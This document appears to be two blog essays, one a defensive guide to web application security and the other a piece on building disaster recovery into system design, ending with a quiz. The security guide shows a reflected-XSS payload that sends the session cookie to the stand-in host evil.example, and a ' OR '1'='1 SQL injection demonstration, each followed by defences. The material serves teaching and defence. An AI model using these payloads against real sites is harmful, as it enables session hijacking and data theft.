
Website Security Engineered into the Design


The Challenge

A website is open to the public on an anonymous basis.  It must be easy to use, yet it must also protect both the user and the business.  A website that does not deploy reasonable security precautions is open to hacking.  Hacking is not mysterious and in some cases can be done quite easily, and it can result in huge problems, including:

  • The site displaying unwanted or inappropriate messages
  • The user’s web identity being hijacked
  • A loss of critical data for the company
  • Public loss of confidence

A site’s security depends upon many components, from the IT infrastructure down to the user’s desktop.  This discussion assumes that all appropriate environmental controls are in place and effective, and that the user has taken reasonable precautions.  The focus will be on the most common vulnerabilities in public-facing web applications and the best practices that close the gaps.  No single countermeasure will guarantee web security; however, a suite of careful protections designed into the web architecture can deliver a reasonable level of security.

Unfortunately, HTML was originally designed simply to mark up documents, and its use has since expanded dramatically on the web.  By tasking it beyond its original design, many vulnerabilities have surfaced that can be easily exploited unless specific safeguards are deployed.

There are many good benchmarks for web application security design from the SANS Institute, MITRE, and the Open Web Application Security Project (OWASP).  These guides describe the most common problems and the generally accepted best-practice solutions.  The following discussion drills down into some of the key issues that often result from coding, design, or implementation errors or omissions.  The goal here is to show how vulnerabilities within web applications can be limited or even prevented, starting with the most commonly reported problems.

Common problems

A website can be made vulnerable to attack through ignorance, bad design, or sloppy implementation.  In some cases, the website builder is simply not aware of the gaps in HTML.  A site that is designed from the ground up with the common vulnerabilities in mind will have few problems, but it still requires careful, thoughtful implementation and testing to form a complete security umbrella.  Some of the most common issues that a good design must guard against are:

  • Failure to preserve web page integrity, which opens the door to cross-site scripting (XSS).  This occurs whenever a site accepts input directly without sufficient validation.  The malicious input is typically a script that can steal the user’s session identity, display unauthorized messages, and/or collect unauthorized data.  The injection is typically done with short scripts written in common languages such as JavaScript.  The vulnerability exploits the trust the user has in an existing site.  The approaches are:
    • Non-persistent or reflected – script commands used immediately to generate page content in order to collect information about the site.
    • Persistent or stored – script commands embedded in comments on a site to collect information about other users.
    • DOM (Document Object Model) – client-side hijacking during the assembly of the HTML, typically through error messages.

A typical example:
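
Sketched below in Python (the page handler and host names are hypothetical, for illustration only), a handler that echoes a search term straight into the generated HTML will happily return an attacker-supplied script, which then runs in the victim’s browser and can forward the session cookie to a host the attacker controls.

  # Hypothetical page handler that reflects user input with no validation.
  def render_search_page(query):
      # The user-supplied value is concatenated directly into the HTML.
      return "<html><body>Results for: " + query + "</body></html>"

  # A normal request behaves as expected...
  print(render_search_page("blue widgets"))

  # ...but a crafted link injects a script that forwards the victim's
  # session cookie to an attacker-controlled host (evil.example is made up).
  payload = ("<script>document.location="
             "'http://evil.example/steal?c=' + document.cookie</script>")
  print(render_search_page(payload))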

  • Failure to preserve the SQL query structure (SQL injection) within the page.  This occurs most commonly where a site builds SQL commands to collect data from a host database and those commands contain variables populated by user input.  An attacker who recognizes this (for example, by examining the page source) supplies additional commands as the input.  The input prematurely terminates the existing SQL statement and appends the attacker’s own request with valid SQL syntax.  The expanded query is executed along with the original SQL code and returns the information the attacker requested.  This gives the attacker an opportunity to probe the site database for progressively deeper information.  Items that can be retrieved and/or modified include:
    • Lists of users
    • User credentials
    • User email addresses (which can then be changed)

A typical attack on a username field:

Input:  ' OR '1'='1

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

becomes:  SELECT * FROM users WHERE name = '' OR '1'='1';
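
The same idea in runnable form, as a minimal sketch using Python and an in-memory SQLite database (the table and data are made up): the concatenated statement lets the input rewrite the query, while parameter binding, one widely used way to preserve the query structure, keeps the entire input inside a single string value.

  import sqlite3

  # Stand-in database for illustration only.
  conn = sqlite3.connect(":memory:")
  conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
  conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

  user_name = "' OR '1'='1"   # the attacker's "username"

  # Vulnerable: the input terminates the string literal and extends the query.
  statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
  print(conn.execute(statement).fetchall())    # returns every row

  # Parameterized: the input is treated as data, never as SQL.
  print(conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall())  # returns []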

 

 

 

  • Inadequate session management invalidates the authentication and rights controls for website usage.  When a user is first authenticated upon entering a site, they are provided a session ID (SID).  The challenge is how to store and pass the SID between pages as the user navigates the site; this is necessary because HTML is essentially stateless without additional controls.  There are three methods to provide state to a set of pages:
    • GET method.  This simply passes the SID in the query string, e.g. http://mysite.com/page1.aspx?session=123456789
    • POST method.  In this case, the SID is carried in form tags (input, select, and text fields) within the HTML page.
    • Cookie.  This writes the SID to the browser’s local temporary storage.  Modern browsers do a better job of restricting access to the SID to only the authorized, originating site, but older browsers have big gaps.  Even so, the access control depends significantly upon the data placed in the cookie.

All of these methods can be made secure or insecure depending upon the application.  According to the SANS Institute, "all of the methods can be made reasonably secure through intelligent design."

The vulnerability exists when a valid SID is stolen or an imposter SID is created.  The goal of many site attacks is precisely to obtain a SID.  In other cases, weak sites are built with downloaded widgets that create the site’s SIDs; the construction of SIDs using such public-domain tools is often predictable.  Several web resources document the SID construction used by many popular web frameworks.

  • Cross-site request forgery (CSRF) occurs when the user’s browser is tricked into sending unauthorized requests to a target site on the user’s behalf, without any action on the part of the user.  A malicious instruction set is placed in a public forum, often inside an image, which gives hidden instructions to the browser acting as a deputy for the user.  For example, the scripts can instruct the browser to:
    • log on to sites on behalf of the user
    • send out weakly protected stored passwords and SIDs
    • initiate transactions

Fortunately, CSRF can inflict the most damage only when the user is viewing the attacking site while simultaneously logged onto the target site.  However, browsing multiple sites at once is common.

  • Clear-text transmission of sensitive information can expose both user and site data.  This problem can arise either between the desktop browser and the web server, or between the web server and the database host.  The most critical zone is the public internet space between the end user and the website.  While en route, the data can travel through many hops and be deposited in many caches and logs, where it is vulnerable to sniffers and other monitors.

 

 

Application Best Practices

The following are common methods used to minimize the most common web vulnerabilities.  No single element will make a website secure; however, when these methods are combined with active monitoring, a website can be made reasonably secure.  A website must be designed to:

Contain strong field validations on ALL input

All inputs must be validated.  The simple form of validation, escaping string input, is a good start, but it is not sufficient.  Escaping is the process of replacing the five significant HTML characters (&, <, >, ", and ').  Unfortunately, the scripting variations are too complex and clever for escaping alone.

  • The simplest control is to limit the field size to ONLY the expected input.  Inputs must be validated for length, type, and syntax before being used or displayed.
  • Then look for and accept only the values expected (referred to as a white list).  Since sanitizing input has not proven successful, it is best to simply reject invalid input (a minimal sketch follows this list).
  • If still more validation is needed, use a dedicated encoding library such as the Microsoft Anti-XSS Library 1.5 for .NET.
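
A minimal sketch of the white-list approach in Python (the field rules shown are illustrative assumptions, not a standard): each input is checked for length and syntax against what is expected, and anything else is rejected outright rather than sanitized.

  import re

  # Hypothetical per-field rules: maximum length plus an allowed pattern.
  FIELD_RULES = {
      "username": (30, re.compile(r"^[A-Za-z0-9_]+$")),
      "zip_code": (10, re.compile(r"^[0-9]{5}(-[0-9]{4})?$")),
  }

  def validate(field, value):
      # Accept the value only if it matches the white list; otherwise reject.
      max_len, pattern = FIELD_RULES[field]
      if len(value) > max_len or not pattern.match(value):
          raise ValueError("invalid input for field: " + field)
      return value

  validate("username", "alice_01")                       # accepted
  try:
      validate("username", "<script>alert(1)</script>")  # rejected, not 'cleaned'
  except ValueError as err:
      print(err)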

Since it is impractical to eliminate the use of cookies, they must be protected as much as possible.  Cookies can be restricted to the originating site and marked HttpOnly so that they travel only with HTTP requests and cannot be read by client-side scripts.  However, there are still exceptions around these protections.
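
As a sketch of those restrictions (the cookie name, domain, and value are illustrative), the Set-Cookie header can scope the SID to the originating site and mark it HttpOnly, and over SSL it can also be marked Secure so it never travels in the clear:

  from http.cookies import SimpleCookie

  cookie = SimpleCookie()
  cookie["SID"] = "abc123def456"            # illustrative session ID value
  cookie["SID"]["domain"] = "mysite.com"    # returned only to the originating site
  cookie["SID"]["path"] = "/"
  cookie["SID"]["httponly"] = True          # not readable by client-side script
  cookie["SID"]["secure"] = True            # sent only over HTTPS connections
  print(cookie.output())                    # the resulting Set-Cookie header line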

Use a strong output encoding for all generated pages (such as ISO-8859-1 or UTF-8), and do not allow the attacker to select it.

Deploy a Strong Session Management Strategy

Building in a strong session management approach will significantly limit the exposure if the site is penetrated through one of the other vulnerabilities.  Conversely, no additional control, including encryption, can compensate for weak session management.  The basic logon controls usually start out solid, but gaps often appear when implementing ancillary functions such as logout, timeout, ‘remember me’, and keep-alive.  The best methods for maintaining control of the session are:

  • Store only general information in the SID.  Even if hashed, do not store any user credentials as part of the SID.
  • If using the GET method, use referrer filtering.  This simply means washing each page through a link-filter page so that the referring page (and the SID it carries) is dropped before the request leaves the site.  Without this step, the SID leaks to other sites through the referrer.  However, some graphics and advertisements can still thwart this protection.
  • Verify that public error messages and crash dumps do not contain the SID.
  • Automatically expire SIDs after a period of inactivity or an absolute time.  This also means not allowing users to inherit an existing open SID or to supply their own SID.  If the user logs on and a SID is still open, it must be expired and a new one generated.  A site must be ‘strict’ about assigning a unique SID to each user (a permissive site accepts user-supplied SIDs or allows SIDs to be inherited).  Disallowing multiple concurrent logons makes it possible to determine whether a SID has been stolen or duplicated.
  • Use a strong SID construction of at least 32 characters.  A 32-character, case-sensitive alphanumeric SID yields roughly 62^32, or about 2.27 × 10^57, possible combinations – that is sufficient.  It is best to use the built-in SID generators that come with the popular platforms and avoid home-grown controls or downloaded widgets.
  • Manage the generated SIDs on the server side within a database.  Do not store them in a temporary location subject to alternate rights authentication.  It is best to also hash the SIDs within the database to force their use only through the application (see the sketch after this list).
  • Build in a logging and alerting system to record attempted uses of expired SIDs.  This aids in detecting a site attack and also in identifying a DoS (Denial of Service) attack, which can be mounted by sending invalid SIDs to the system to force the logout of legitimate users.
  • Every page should have a clearly displayed ‘Logout’ button.  Too many sites, in their effort to keep users on the site, make the logout button difficult to find, so all too many users simply close the browser window and rely upon the SID timeout.
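
A minimal sketch covering several of these points (the table layout and the 15-minute idle window are assumptions): the SID comes from Python’s built-in cryptographic generator, only a hash of it is stored server side, and it expires after a period of inactivity.

  import hashlib, secrets, sqlite3, time

  IDLE_TIMEOUT = 15 * 60   # illustrative inactivity window, in seconds

  db = sqlite3.connect(":memory:")
  db.execute("CREATE TABLE sessions (sid_hash TEXT PRIMARY KEY, user_id TEXT, last_seen REAL)")

  def create_session(user_id):
      sid = secrets.token_urlsafe(32)                      # built-in, unpredictable generator
      sid_hash = hashlib.sha256(sid.encode()).hexdigest()
      db.execute("INSERT INTO sessions VALUES (?, ?, ?)", (sid_hash, user_id, time.time()))
      return sid                                           # the raw SID never touches the database

  def lookup_session(sid):
      sid_hash = hashlib.sha256(sid.encode()).hexdigest()
      row = db.execute("SELECT user_id, last_seen FROM sessions WHERE sid_hash = ?",
                       (sid_hash,)).fetchone()
      if row is None or time.time() - row[1] > IDLE_TIMEOUT:
          return None    # unknown or expired SID: a candidate for logging and alerting
      db.execute("UPDATE sessions SET last_seen = ? WHERE sid_hash = ?", (time.time(), sid_hash))
      return row[0]

  sid = create_session("user42")
  print(lookup_session(sid))                       # 'user42'
  print(lookup_session("stolen-or-expired-sid"))   # None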

Deploy Forgery Prevention

A site must recognize that it may be subject to automated actions taken on behalf of its users.  These CSRF actions often have tell-tale signs that can be recognized and stopped.  A site is less exposed to unauthorized deputy actions when it:

  • Does not rely solely upon a cookie (see the sketch after this list)
  • Requires and validates the HTTP referrer – the header in each request showing the page where the user request originated
  • Uses additional transaction-confirmation authentication.  This is common when changing a password, but it can also be used to confirm a final purchase or action.  Multiple-factor authentication, such as a random picture code, effectively disables unattended scripted actions.
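
One common way to avoid relying on the cookie alone is a per-session anti-forgery token: it is embedded in each form the site serves and checked on every state-changing request, and because the attacking page cannot read it, the forged request fails.  A minimal sketch (function names are illustrative):

  import hmac, secrets

  def issue_csrf_token():
      # Generated with the session and embedded in each form as a hidden field.
      return secrets.token_urlsafe(32)

  def is_request_authentic(session_token, submitted_token):
      # Constant-time comparison of the stored token with the submitted one.
      return hmac.compare_digest(session_token, submitted_token)

  token = issue_csrf_token()
  print(is_request_authentic(token, token))            # True  - legitimate form post
  print(is_request_authentic(token, "forged-value"))   # False - cross-site forgery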

Use Secure Sockets Layer (SSL)

In today’s world, secure transmission is largely handled by Secure Sockets Layer (SSL).  A third-party certificate is used to encrypt the data in transit, visible to the user as an https: address.  This largely covers communication in the public internet zone.  However, it does not cover the connection between the web server and the database host.  That connection can be secured by using a closely routed, switched network and setting the NIC interfaces to non-promiscuous mode.  In this manner, internal networks are substantially secure (except for WAN links).  Some implementations are also looking at encrypting data in transit on the back end, which can be done with Microsoft’s Transparent Data Encryption (TDE) for SQL Server 2008.

Explore Alternative Measures

In some cases, users may opt to suspend scripting in their browser.  However, this eliminates much of the modern functionality demanded for usability.  There are domain/zone-based controls for client-side scripting, but these require advanced knowledge and skills that the average user usually lacks.  Scripting is probably here to stay, but a site can still educate its users on best practices and show them how to properly identify the official site.

Use Intermediary Page Generation Handlers

For new websites, the best approach is to architect the site engine around an intermediary page assembler.  This processor accepts only the expected input parameters, consumes XML data from various sources, adds static content, and then responds with the HTML page.  User input from the browser is never used directly by the page or the SQL.  Instead, the specific user inputs are validated and used in a managed replacement process to generate dynamic actions.  This buffer not only makes it difficult for an attacker to see how the variables are used, but also prevents unexpected inputs from reaching the final assembly and being executed.  An example of this secure, modular web framework is used by Planserve Data Systems.
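
A minimal sketch of the pattern (the parameter names, data source, and markup are hypothetical): the assembler accepts only the expected parameters, fetches the data itself, and escapes every dynamic value on output, so raw browser input never reaches the page or the SQL directly.

  import html

  EXPECTED_PARAMS = {"product_id"}          # hypothetical white list of inputs

  def fetch_product_data(product_id):
      # Placeholder for the real data sources (database, XML feeds, etc.).
      return {"name": "Widget <Deluxe>", "price": "19.99"}

  def assemble_page(params):
      # 1. Accept only the expected input parameters; reject anything else.
      if set(params) != EXPECTED_PARAMS:
          raise ValueError("unexpected input parameter")
      # 2. The assembler, not the browser, decides what data is consumed.
      data = fetch_product_data(params["product_id"])
      # 3. Managed replacement: every dynamic value is escaped before assembly.
      return "<html><body><h1>{}</h1><p>Price: {}</p></body></html>".format(
          html.escape(data["name"]), html.escape(data["price"]))

  print(assemble_page({"product_id": "1001"}))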

 

Conclusion

The purpose of this discussion is to help application developers avoid the common issues when designing, coding, and implementing an external facing web application.   These items must be considered before the first page is constructed or the site colors picked.

Before going into production, every website should be subjected to a thorough ‘penetration’ test.  There are several 3rd parties and tools which can be used to conduct an independent test.  However, it is costly and difficult to address vulnerabilities found at late stages of a web deployment project.  Any mitigation steps at that point are likely to be patchwork workarounds which will either fail or introduce other vulnerabilities. 

In order to prevent this project nightmare, the discussion here presented methods to address or mitigate the common vulnerabilities during the initial design and architecting of the site.  The site security must be baked in from the initial design all the way through to the final implementation.  If these key measures are implemented in a structured manner, the site will be reasonably secure.

 

References

 

http://msdn.microsoft.com/en-us/library/aa973813.aspx

http://en.wikipedia.org/wiki/Cross-site_scripting

http://www.sans.org/reading_room/whitepapers/webservers/secure-session-management-preventing-security-voids-web-applications_1594

http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm

http://www.cgisecurity.com/owasp/html/guide.html#id2843025

http://www.owasp.org/index.php/Top_10_2007

http://www.acunetix.com/websitesecurity/xss.htm

http://www.planserve.net

http://www.hackthissite.org

Disaster Recovery is dead


If your IT shop is less than perfect, you are already an expert in disaster recovery at many levels.  The reason is the faulty way applications have traditionally been implemented, which means spending more and more time on recovery efforts while still not getting the results the business demands.  Disaster recovery plans are a lot like elephant repellent in New York City: the effectiveness remains unknown until it is too late.  Fortunately, disaster recovery will no longer be needed after the end of 2011.

The doubters will be quick to point out that high availability is now a standard business expectation.  The systems have to stay up.  The perceived demands on IT continue to inflate.  But what is the business really demanding?  Do the customers really want to pay for it?  Or is the overhead of disaster recovery just there to avoid employee inconvenience or to provide executives with plausible deniability?  The challenge is that IT staffs have fallen into a tradition of separating application design, implementation, and recovery.  The failure of this approach is catastrophic:

  • Budget-minded small to midsized businesses (SMBs) once viewed business continuity (BC) planning as an expensive luxury.  Not anymore: upgrading disaster recovery (DR) capabilities is a major priority for 56% of IT decision makers in the U.S. and Europe, according to Forrester Research Inc.
  • While companies think they are immune to any long-term outage, more than one-fourth of companies have experienced a disruption in the last five years, averaging eight hours – one business day.  (Source: Comdisco Vulnerability Index)
  • The U.S. Department of Homeland Security says one in four businesses won’t reopen following a disaster.

But what is a disaster recovery plan?  If you ask the IT staff, it is rebuilding boxes.  If you ask the communications manager, it is re-establishing connectivity.  If you ask the PM, it is a large collection of nicely formatted documents.  So which of the following is a disaster recovery plan?

  • Backup Tapes
  • Document
  • Software
  • Contracts
  • Recovery site
  • Server Virtualization

Perhaps we find that it is really none of the above.  The individual items lead us to an overly narrow view of the effort, and away from the business.  We will find that an ounce of prevention is worth a terabyte of cure.

To better understand the needs of recovery, we first need to look at the types of disasters and the likelihood of each occurring.  We are all familiar with the dangers of a hurricane – obviously bad for business.  But equally damaging is a business user posting the same address to all participants, or someone dropping a billing table.  Which is more likely to occur on our watch?  Should the recovery effort really be any different?  The new view of disaster recovery addresses both situations with the same solution.

 

To address these needs, there are various types of recovery strategies.  In fact, ALL companies have a fully functioning disaster recovery plan; the only difference is the result the plan achieves.   The following are common types of plans.  In order to protect the guilty, the businesses using each have been omitted.

  • Denial
  • Bunker
  • Copy
  • Nuclear
  • Active (right answer)

Which type of plan do you believe you have?  Do all members of your company have the same impression?  Incredibly, more than 44% of companies with a workable disaster recovery plan have NOT informed anybody about the plan.  Why?  Is it because they don’t believe it will work, or because they don’t want to take responsibility for it?  It is easy for the CEO to buy into the idea that they have done their ‘due diligence’ by spending a ton on a nuclear scheme.  But is spending a real benchmark for recovery?  In fact, some of the best recovery plans can be done quite affordably.  The key is to have an active resilience plan that is used on a daily basis.

It is the business…stupid.  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  Which of the following should we be focusing on?

  • Backups
  • Disaster Recovery
  • Business Continuity (right answer)

The most powerful metric:  “Are you trying to avoid employee inconvenience with your requested service levels?”  IT staff are all too often the guy with the hammer who sees every problem as a nail.  We forget that business was dutifully conducted before faxes, email, ETL, and mobile phones.  What is really critical to the business?  And how can it be done in a pinch with a manual solution?  All too often the first question is how to replicate the databases all over the planet, when the question we should be asking is: how can we call the customers?  The real need is to establish business continuity.

We can distill the needs by looking at common terms in the recovery business.  But we cannot accept the representations of the primary users as gospel.  All users will say their functions must be available 100% of the time with no possibility of any data loss: really?  This is seldom the truth from a core business perspective.

  • Recovery Time Objective (RTO) – the time required to recover critical systems to a functional state, often assumed to be “back to normal” for those systems designated as mission critical.
  • Recovery Point Objective (RPO) – the point in time to which the information has been restored once the RTO has elapsed; in practice it depends on what is available from an offsite data storage location.

 

The Test

A great test is to ask the staff whether they are willing to take a 10% pay decrease to build out a nuclear infrastructure.  When the decision is made personal, it is amazing what clever workarounds people are capable of.  This forces the conversation away from how to build bigger IT plants and toward how to achieve business continuity.

Another overlooked test is to ask the customer.  But you have to ask the customer the right way.  If you simply ask whether they want everything all the time, the answer will be yes.  But suppose you gave your bank customers the following options:

  • Be guaranteed access to their account 24×7, but pay fees of $200 a month (the fees are there whether advertised or not).
  • Accept strong but imperfect availability, with access down from time to time, and receive a credit of $400 a month in their account (yes, the swing is 2x).

Some recovery experts suggest categorizing applications; they are usually project managers or consultants looking for work.  Or we can break out a crystal ball and try to prioritize the impact.  This usually results in a massively huge cost estimate (think infinity).  This approach is widely used by hardware sales agents trying to sell a nuclear gizmo.  However, the thinking is flawed because more and more portal data is interconnected.  A portal may consume both high-priority and low-priority data.  But has your portal been tested to function WITHOUT the low-priority data?  A silo view is no longer practical because virtually everything is interconnected.

So then, should we simply replicate everything?  Well, although more and more shops technically have all of their data replicated to a DR location, it is not readily usable by applications because it is not in sync. As a result, database administrators and application specialists need to spend additional hours, sometimes days, reconciling data and rolling databases back to bring the various data components into alignment. By the time this effort is complete, the desired recovery window has long since been exceeded.

The hard part is not rebuilding the box.  The most common mistake businesses make when determining service-level requirements is trying to keep the business running as if nothing happened.  The point is not that some new cool technology like clouds and SANs are not useful, but rather that the usage needs to be designed into the application deployment.  If it is designed as an afterthought and assigned to another department, the costs will rise and the effectiveness will drop.

You have to make sure your disaster recovery plan will work with or without the internal key people who developed it. If the director in charge of financial ERP applications wrote the plan, for example, ask the business intelligence manager to test the recovery.  The biggest bottleneck to any recovery is not the applications or the data, but rather the key people who know how the proprietary tools were configured for your shop.  If a hurricane hits, your staff needs to be focused on their families, not your CRM systems.

The secrets to success

  • Build resiliency into the design – Keep the architecture simple.
  • Build before planning
  • Reverse the offsite co-location so that the primary location is remote and the recovery is local.
  • Include key vendors in the plan so that they can provide assistance.
  • Use offshore resources to validate and bring the secondary sites current on a daily basis – routine failovers.
  • Make high availability the responsibility of everyone – business and IT.

 

The secrets to failure

  • Depend upon familiar local resources
  • Plan before building
  • Use complex technology that inserts more moving parts into the daily operations
  • Prepare thick complex manuals.
  • Designate a special recovery team
  • View the recovery in terms of hardware
  • Test the process annually over a 1-2 day period.
  • Forget unique needs of legacy applications.
  • Assume each application is an independent silo

Where should you spend money?  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  We are all familiar with the extreme cost of moving from 99% uptime to 99.99%.  But let’s say it a different way: it is easy to overspend trying to eliminate short downtimes, where the business impact is fairly low, and we probably do not spend enough making darn sure we can avoid long-term downtimes.  Ironically, many of the nuclear solutions insert so many moving parts to keep us instantly available that when they fail, we are usually down for days or weeks.  It is easy to underspend on protecting against the big impacts.

Where to spend too much money?

  • Overprotecting data that is not critical to the business’s daily needs
  • Failing to maintain disaster recovery plans
  • Testing disaster recovery plans too often
  • Overlooking the benefits of server virtualization
  • Being reluctant to renegotiate with disaster recovery service providers
  • Relying on technology as a silver bullet
  • Engaging a consultancy to produce a detailed plan

 

How to save money?

  • Identify all of the costs
  • Determine the assumptions
  • Review the cost allocation
  • Build the recovery cost into the implementation

Clearly, the costs for distinct disaster recovery spending are trending upward.  Spending keeps rising because, structured this way, it cannot deliver the results.  When the recovery effort is assigned to a separate team or department, the right people are not bearing the costs of availability, and so we cannot get unbiased feedback on the real needs.  As the cost of availability becomes baked into implementations, the cost as a separate line item evaporates.  And the overall spend is actually reduced, because it is cheaper to build it in once than to design and implement it twice.

Thus, new implementations will bake in the appropriate resilience, making disaster recovery obsolete.  This will be the final step in the evolution of recovery.

Can recovery itself be a disaster?  Whether in a test or an actual recovery, the plan itself can be a substantial security risk.  During the process, the protected data is outside of its normal zone and subject to unexpected events as well as organized threats.  Companies go to great lengths to protect the PII (personally identifiable information) within their data centers, but overlook the exposures during a recovery effort.  Some are flat out unavoidable:

  • How to get data to the facility?
  • How to recover licenses?
  • How to recover keys?
  • Where are the passwords?
  • What happens to the data after the test?
  • Were any data transmissions logged?

 

So, as an executive, what can you do to take quick stock without hiring an expensive consultant?  Here is a handy executive checklist:

  • What constitutes a disaster?
  • Do all senior managers understand their role in the event of a disaster?
  • How will the interim business be managed?
  • How will public relations be managed?  How will staff communications be managed?
  • How will customers react?  Do they really want to pay for .9999?
  • What are the core business deliveries?  What can be performed through alternative manual means?
  • How much will downtime affect the share price and market confidence?
  • How will the recovery effort be staffed?
  • What is the resiliency of the solutions purchased?
  • What is the PII exposure during a recovery effort?

  

A checklist to see what you learned

1)  Organizations should lay out a five-year plan with a recovery time objective that is ________
a. Less than two hours
b. Going to improve over time
c. The same as what you have now

2)  Of the 50% to 70% of organizations that develop IT disaster recovery plans, fewer than ____ actually test those plans.
a. One quarter
b. One third
c. One half

3)  44% of disaster recovery planners polled haven’t told anybody that a DR plan exists in their organization.
True
False

4)  How do current budget constraints change IT disaster recovery discussions with other parts of the business?
a. They don’t – IT should proceed as it has before.
b. They make it more important to involve other business departments.
c. They make it less important to involve other business departments.

5)  The test of an IT disaster recovery plan came fast and furiously last year at a gas and electric company, when flood waters swept over its Cedar Rapids, Iowa, territory.  What technology, not touted as a big piece of the IT disaster recovery plan, came to the rescue?
a. Voice over Internet Protocol
b. Desktop virtualization
c. Duplication services

6)  The recession is putting a squeeze on budgets for outsourcing disaster recovery services.  As such, CIOs are turning to _________ to reduce floor space at their leased recovery sites, according to providers of IT disaster recovery services.
a. Server virtualization
b. Cloud computing
c. Contract renegotiation

7)  How are companies using cloud computing for IT disaster recovery outsourcing?
a. They’re increasing the number of licensees with access to DR applications.
b. They’re moving mission-critical applications to a cloud environment.
c. They’re creating carbon copies of applications.